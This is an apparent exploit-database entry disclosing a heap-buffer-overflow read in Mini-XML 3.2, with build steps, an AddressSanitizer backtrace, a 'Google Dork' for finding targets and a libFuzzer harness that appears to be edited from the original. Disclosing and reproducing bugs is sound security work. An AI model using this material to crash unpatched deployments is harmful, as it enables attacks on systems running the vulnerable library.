## https://sploitus.com/exploit?id=PACKETSTORM:164702
# Exploit Title: Mini-XML 3.2 - Heap Overflow  
# Google Dork: mxml Mini-xml Mini-XML  
# Date: 2020.10.19  
# Exploit Author: LIWEI  
# Vendor Homepage: https://www.msweet.org/mxml/  
# Software Link: https://github.com/michaelrsweet/mxml  
# Version: v3.2  
# Tested on: ubuntu 18.04.2  
  
# 1.- compile the Mini-XML code into a library using the compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".  
# 2.- compile my test case and link it with the library into a binary using the compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my test case, I use the API "mxmlLoadString" to parse a string.  
# 3.- run the binary for a short time; it crashes because "mxml_string_getc" does not verify the string's length, causing a buffer overflow.  
# 4.- Here is the crash backtrace.  
  
=================================================================  
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98  
READ of size 1 at 0x612000000a73 thread T0  
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13  
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20  
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11  
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8  
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)  
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)  
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)  
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)  
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310  
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)  
  
  
# 6.- Here is my test case.  
  
#include <assert.h>  
#include <cstdint>  
#include <cstdlib>  
#include <string>  
#include <vector>  
#include "mxml.h"  
  
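/// libFuzzer entry point: hands the fuzzer-provided bytes to Mini-XML's
/// mxmlLoadString() and, when a tree is produced, round-trips it through
/// mxmlSaveAllocString() before releasing everything again.
///
/// @param data  fuzzer-provided input bytes (not NUL-terminated)
/// @param size  number of bytes in @p data
/// @return always 0, as libFuzzer requires
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    // mxmlLoadString() takes a C string, so copy the raw bytes into a
    // std::string: c_str() guarantees a NUL terminator for the parser to
    // stop at, which the raw fuzzer buffer does not provide.
    const std::string input(reinterpret_cast<const char *>(data), size);

    mxml_node_t *tree = mxmlLoadString(nullptr, input.c_str(), MXML_NO_CALLBACK);
    if (!tree) {
        return 0;
    }

    char *saved = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
    // A null result means serialization failed; the original harness treats
    // that as a harness-level bug and aborts rather than continuing.
    assert(saved != nullptr);

    // mxmlSaveAllocString() returns a heap buffer owned by the caller. The
    // original harness never released it, so LeakSanitizer would report a
    // leak on every iteration and bury the real finding; free it here.
    // free(nullptr) is a no-op, so this is also safe when NDEBUG disables
    // the assert above.
    free(saved);
    mxmlDelete(tree);

    return 0;
}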